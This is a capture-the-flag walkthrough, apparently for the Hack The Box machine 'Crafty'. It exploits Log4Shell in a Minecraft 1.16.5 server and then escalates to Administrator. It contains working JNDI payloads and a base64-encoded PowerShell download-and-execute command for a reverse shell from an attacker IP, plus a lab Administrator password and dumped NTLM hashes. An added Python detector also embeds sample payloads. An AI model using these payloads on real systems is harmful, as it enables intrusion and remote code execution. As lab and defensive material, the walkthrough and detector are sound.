Basic information

Port scan

A regular scan shows only port 80:

$ nmap -sC -sV 10.10.11.249
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-12 12:30 CST
Nmap scan report for 10.10.11.249
Host is up (0.091s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://crafty.htb
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.99 seconds

80

A hosts entry is needed:

10.10.11.249 crafty.htb

It reveals another domain name that looks like an MC server; the default port confirms it is Minecraft:

$ nmap -sC -sV -p25565 10.10.11.249
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-12 12:34 CST
Nmap scan report for crafty.htb (10.10.11.249)
Host is up (0.096s latency).

PORT STATE SERVICE VERSION
25565/tcp open minecraft Minecraft 1.16.5 (Protocol: 127, Message: Crafty Server, Users: 0/100)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.98 seconds

minecraft

If you don't want to install MC locally, you can use this directly:

The play domain works with or without a hosts entry; leave the password empty and use offline mode:

log4j

This machine is three years late; from the MC version number and memory of earlier cases, we can tell log4j is present:

${jndi:ldap://10.10.16.2:4444/test}

log4shell

It is just the standard log4shell; it lands us as svc_minecraft:

java -jar JNDIExploit-1.3-SNAPSHOT.jar -i 10.10.16.2 -l 1389 -p 8080

# echo "ping 10.10.16.2" | base64
${jndi:ldap://10.10.16.2:1389/Basic/Command/Base64/cGluZyAxMC4xMC4xNi4yCg==}
# powershell -c "(New-Object Net.WebClient).DownloadString('http://10.10.16.2:7777/rev.ps1') | iex"
# cG93ZXJzaGVsbCAtYyAiKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMC4xMC4xNi4yOjc3NzcvcmV2LnBzMScpIHwgaWV4Ig==
${jndi:ldap://10.10.16.2:1389/Basic/Command/Base64/cG93ZXJzaGVsbCAtYyAiKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMC4xMC4xNi4yOjc3NzcvcmV2LnBzMScpIHwgaWV4Ig==}
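As an added defender-side example (not part of the original writeup): a small detector for the kind of lookup string used above, run over constructed Minecraft server log lines. Since 1.16.5 logs chat through Log4j, the chat line is where the `${jndi:...}` string lands; the detector also collapses the single-character nested lookups (`${lower:j}`, `${::-j}`) that are commonly used to disguise it. Timestamps, player names and log lines are constructed.

```python
import re

# Nested lookups that resolve to one character and are used to disguise "jndi":
#   ${lower:j} -> j, ${upper:j} -> J, ${::-j} -> j, ${env:NOPE:-j} -> j
# "[^}$]" keeps a match from swallowing another "${...}" nested inside it.
_OBFUSCATED_CHAR = re.compile(
    r"\$\{\s*(?:lower|upper)\s*:\s*([^}$])\s*\}"   # ${lower:j}
    r"|\$\{[^}$]*?:-\s*([^}$])\s*\}"               # ${::-j}, ${env:NOPE:-j}
)
# A JNDI lookup using one of the schemes Log4Shell payloads rely on.
_JNDI_LOOKUP = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldap|ldaps|rmi|dns|iiop|corba|nds|http)\s*:", re.I
)

def normalize(text):
    """Collapse single-character nested lookups, innermost first, until stable."""
    prev = None
    while prev != text:
        prev = text
        text = _OBFUSCATED_CHAR.sub(lambda m: m.group(1) or m.group(2), text)
    return text

def find_jndi_lookups(line):
    """Return the JNDI schemes found in one log line (empty list if clean)."""
    return [m.group(1).lower() for m in _JNDI_LOOKUP.finditer(normalize(line))]

# Constructed sample lines in the Minecraft server log format; not real traffic.
SAMPLE_LOG = [
    "[12:30:01] [Server thread/INFO]: steve joined the game",
    "[12:30:02] [Server thread/INFO]: <steve> ${jndi:ldap://10.10.16.2:1389/Basic/Command/Base64/cGluZw==}",
    "[12:30:03] [Server thread/INFO]: <alex> ${${lower:j}ndi:${lower:r}mi://10.10.16.2:1099/x}",
    "[12:30:04] [Server thread/INFO]: <alex> ${${::-j}${::-n}${::-d}${::-i}:ldap://10.10.16.2:1389/a}",
    "[12:30:05] [Server thread/INFO]: <steve> price is ${10} gold, not a lookup",
]

def scan_log(lines):
    """Map the timestamp of each suspicious line to the schemes it contains."""
    hits = {}
    for line in lines:
        schemes = find_jndi_lookups(line)
        if schemes:
            hits[line[:10]] = schemes
    return hits

if __name__ == "__main__":
    for ts, schemes in scan_log(SAMPLE_LOG).items():
        print(f"{ts} possible Log4Shell lookup via {', '.join(schemes)}")
```

The same function can be pointed at the server's `logs/latest.log` to flag lookups after the fact; the real fix is upgrading Log4j or the server build.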

user flag

Bring in msf to make the later steps easier; the user flag is on svc_minecraft's desktop:

Privilege escalation information

There is a playercounter plugin in the MC server plugins directory; download it and analyze it:

A password is easy to spot:

Privilege escalation & root flag

This password is the Administrator password:

run post/windows/manage/run_as_psh user=Administrator pass=s67u84zKq8IXw

# then bring up another meterpreter session as Administrator
powershell -c "(New-Object Net.WebClient).DownloadString('http://10.10.16.2:7777/rev.ps1') | iex"

hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:686d56296249595a2bc3d7a8807958ad:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
jacob:1001:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::
svc_minecraft:1002:aad3b435b51404eeaad3b435b51404ee:786082f9a8cb7872767bb1a4b7934451:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:7f920fb73571539eb18c0b2f876cfda0:::

References